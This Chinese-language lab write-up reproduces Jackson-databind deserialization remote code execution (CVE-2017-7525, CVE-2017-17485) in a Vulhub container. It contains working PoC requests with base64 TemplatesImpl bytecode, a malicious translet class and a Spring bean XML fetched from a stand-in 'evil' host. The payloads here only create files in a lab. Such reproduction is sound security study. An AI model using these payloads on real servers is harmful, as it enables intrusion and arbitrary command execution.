Vulhub：Jackson[漏洞复现]

CVE-2017-7525(Jackson反序列化)

启动漏洞环境

docker-compose up -d

阅读vulhub给出的漏洞文档

cat README.zh-cn.md

# Jackson-databind 反序列化漏洞（CVE-2017-7525）

Jackson-databind 支持 [Polymorphic Deserialization](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization) 特性（默认情况下不开启），当 json 字符串转换的 Target class 中有 polymorph fields，即字段类型为接口、抽象类或 Object 类型时，攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类)，来实现实例化指定的类，借助某些特殊的 class，如 `TemplatesImpl`，可以实现任意代码执行。

所以，本漏洞利用条件如下：

- 开启 JacksonPolymorphicDeserialization，即调用以下任意方法

  ```java
  objectMapper.enableDefaultTyping(); // default to using DefaultTyping.OBJECT_AND_NON_CONCRETE
  objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
  ```

- Target class 需要有无参 constructor
- Target class 中需要需要有字段类型为 Interface、abstract class、Object，并且使用的 Gadget 需要为其子类 / 实现接口

参考链接：

- [JacksonPolymorphicDeserialization](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization)
- [Exploiting the Jackson RCE: CVE-2017-7525](https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/)
- [jackson-rce-via-spel](https://github.com/irsl/jackson-rce-via-spel)
- [Jackson Deserializer security vulnerability](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)

## 漏洞环境

```shell
docker compose up -d
```

环境启动后，Web运行在`http://your-ip:8080/`。

## 漏洞复现

### CVE-2017-7525

`Jackson-databind` 在设置 Target class 成员变量参数值时，若没有对应的 getter 方法，则会使用 `SetterlessProperty` 调用 getter 方法，获取变量，然后设置变量值。当调用 `getOutputProperties()` 方法时，会初始化 `transletBytecodes` 包含字节码的类，导致命令执行，具体可参考 [java-deserialization-jdk7u21-gadget-note](https://b1ngz.github.io/java-deserialization-jdk7u21-gadget-note/) 中关于 `TemplatesImpl` 的说明。

使用JDK7u21的`com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl`作为Gadget，发送如下请求，将会执行`touch /tmp/prove1.txt`：

```
POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}
```


这个POC只能运行在目标为JDK7u21以下的环境中，其他情况请更换Gadget。

### CVE-2017-17485

CVE-2017-7525 [黑名单修复](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1) 绕过，利用了 `org.springframework.context.support.FileSystemXmlApplicationContext`。

利用该漏洞，我们需要创建一个bean文件，放置在任意服务器上，如`http://evil/spel.xml`，内容如下：

```xml
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>touch</value>
                <value>/tmp/prove2.txt</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>
```

然后，发送如下数据包，使Jackson加载bean，触发漏洞：

```
POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 138

{
  "param": [
    "org.springframework.context.support.FileSystemXmlApplicationContext",
    "http://evil/spel.xml"
  ]
}
```

成功执行`touch /tmp/prove2.txt`：


**原理：** 利用 `FileSystemXmlApplicationContext` 加载远程 bean 定义文件，创建 ProcessBuilder bean，并在 xml 文件中使用 Spring EL 来调用 `start()` 方法实现命令执行

使用curl访问靶机8080端口

curl -v http://192.168.1.138:8080

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://192.168.1.138:8080                
*   Trying 192.168.1.138:8080...
* Connected to 192.168.1.138 (192.168.1.138) port 8080
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 192.168.1.138:8080
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 404
< Content-Type: application/json;charset=UTF-8
< Transfer-Encoding: chunked
< Date: Tue, 17 Dec 2024 07:46:07 GMT
<
* Connection #0 to host 192.168.1.138 left intact
["java.util.LinkedHashMap",{"timestamp":["java.util.Date",1734421567642],"status":404,"error":"Not Found","message":"No message available","path":"/"}]

使用ffuf对靶机8080端口进行路径FUZZ

ffuf -u http://192.168.1.138:8080/FUZZ -w ../dictionary/Half-Dir.txt

由输出可见，/exploit接口爆了405状态码这一般表示请求方式不合法(GET、POST)

修改恶意class模板，使其能在靶机/tmp目录下新建0dayhp文件

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class evil extends AbstractTranslet {

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public evil() throws IOException {
        try {
            String[] commands = {"touch", "/tmp/0dayhp"};
            Process p = Runtime.getRuntime().exec(commands);
            p.waitFor();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) throws IOException {
        evil test = new evil();
    }
}

将java切换到java6(这是重点，该漏洞环境必须使用jdk<=1.7版本编译的class文件才可生效)

sdk install java 6.0.119-zulu

编译该java文件得到：evil.class

javac evil.java

将evil.class内容转换成无换行base64编码

base64 -w 0 evil.class

yv66vgAAADIANgoADAAeBwAfCAAgCAAhCgAiACMKACIAJAoAJQAmBwAnCgAIACgHACkKAAoAHgcAKgEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAKRXhjZXB0aW9ucwcAKwEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACkHACcHACwBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEAClNvdXJjZUZpbGUBAAxFeHBsb2l0LmphdmEMABQAFQEAEGphdmEvbGFuZy9TdHJpbmcBAAV0b3VjaAEACy90bXAvMGRheWhwBwAtDAAuAC8MADAAMQcAMgwAMwA0AQAeamF2YS9sYW5nL0ludGVycnVwdGVkRXhjZXB0aW9uDAA1ABUBAAdFeHBsb2l0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAHd2FpdEZvcgEAAygpSQEAD3ByaW50U3RhY2tUcmFjZQAhAAoADAAAAAAABAABAA0ADgABAA8AAAAZAAAABAAAAAGxAAAAAQAQAAAABgABAAAADQABAA0AEQACAA8AAAAZAAAAAwAAAAGxAAAAAQAQAAAABgABAAAAEgASAAAABAABABMAAQAUABUAAgAPAAAAewAEAAMAAAApKrcAAQW9AAJZAxIDU1kEEgRTTLgABSu2AAZNLLYAB1enAAhMK7YACbEAAQAEACAAIwAIAAIAEAAAACIACAAAABQABAAWABMAFwAbABgAIAAbACMAGQAkABoAKAAcABYAAAAQAAL/ACMAAQcAFwABBwAYBAASAAAABAABABkACQAaABsAAgAPAAAAJQACAAIAAAAJuwAKWbcAC0yxAAAAAQAQAAAACgACAAAAHwAIACAAEgAAAAQAAQAZAAEAHAAAAAIAHQ==

使用Yakit中MITM劫持自带的浏览器访问靶机8080端口并抓包

• 通过之前使用ffuf对靶机进行路径FUZZ可知，/exploit可以接收POST数据
• 这里将GET请求修改为POST请求，并将接口改成/exploit
• 因为需要上传数据，所以这里需要添加两行请求头：Content-Type、Content-Length

通过仿照PoC构造请求包，最终的请求包如下

POST /exploit HTTP/1.1

Host: 192.168.1.138:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 666

{

  "param": [

    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",

    {

      "transletBytecodes": [

  "yv66vgAAADIANgoADAAeBwAfCAAgCAAhCgAiACMKACIAJAoAJQAmBwAnCgAIACgHACkKAAoAHgcAKgEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAKRXhjZXB0aW9ucwcAKwEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACkHACcHACwBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEAClNvdXJjZUZpbGUBAAxFeHBsb2l0LmphdmEMABQAFQEAEGphdmEvbGFuZy9TdHJpbmcBAAV0b3VjaAEACy90bXAvMGRheWhwBwAtDAAuAC8MADAAMQcAMgwAMwA0AQAeamF2YS9sYW5nL0ludGVycnVwdGVkRXhjZXB0aW9uDAA1ABUBAAdFeHBsb2l0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAHd2FpdEZvcgEAAygpSQEAD3ByaW50U3RhY2tUcmFjZQAhAAoADAAAAAAABAABAA0ADgABAA8AAAAZAAAABAAAAAGxAAAAAQAQAAAABgABAAAADQABAA0AEQACAA8AAAAZAAAAAwAAAAGxAAAAAQAQAAAABgABAAAAEgASAAAABAABABMAAQAUABUAAgAPAAAAewAEAAMAAAApKrcAAQW9AAJZAxIDU1kEEgRTTLgABSu2AAZNLLYAB1enAAhMK7YACbEAAQAEACAAIwAIAAIAEAAAACIACAAAABQABAAWABMAFwAbABgAIAAbACMAGQAkABoAKAAcABYAAAAQAAL/ACMAAQcAFwABBwAYBAASAAAABAABABkACQAaABsAAgAPAAAAJQACAAIAAAAJuwAKWbcAC0yxAAAAAQAQAAAACgACAAAAHwAIACAAEgAAAAQAAQAZAAEAHAAAAAIAHQ=="

      ],

      "transletName": "a.b",

      "outputProperties": {}

    }

  ]

}

进入到靶机/tmp目录下

root@66774deccb96:/# ls
bin  boot  dev  etc  home  jackson.jar  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@66774deccb96:/# cd /tmp
root@66774deccb96:/tmp# ls
hsperfdata_root  tomcat-docbase.1291442946857578900.8080  tomcat.6828697716839281401.8080

在Yakit中点击左上角的发送请求，得到响应

此时再查看靶机/tmp目录可见0dayhp文件已被成功创建

root@66774deccb96:/tmp# ls
hsperfdata_root  tomcat-docbase.1291442946857578900.8080  tomcat.6828697716839281401.8080
root@66774deccb96:/tmp# ls
0dayhp  hsperfdata_root  tomcat-docbase.1291442946857578900.8080  tomcat.6828697716839281401.8080